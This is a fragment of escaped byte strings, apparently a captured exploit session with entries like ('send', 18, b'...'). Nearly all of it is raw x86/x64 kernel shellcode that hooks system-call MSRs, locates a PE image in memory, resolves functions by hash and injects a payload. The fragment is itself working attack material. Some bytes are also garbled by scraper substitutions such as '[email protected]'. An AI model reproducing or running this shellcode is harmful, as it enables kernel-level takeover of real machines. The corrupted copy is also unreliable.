\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 18, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 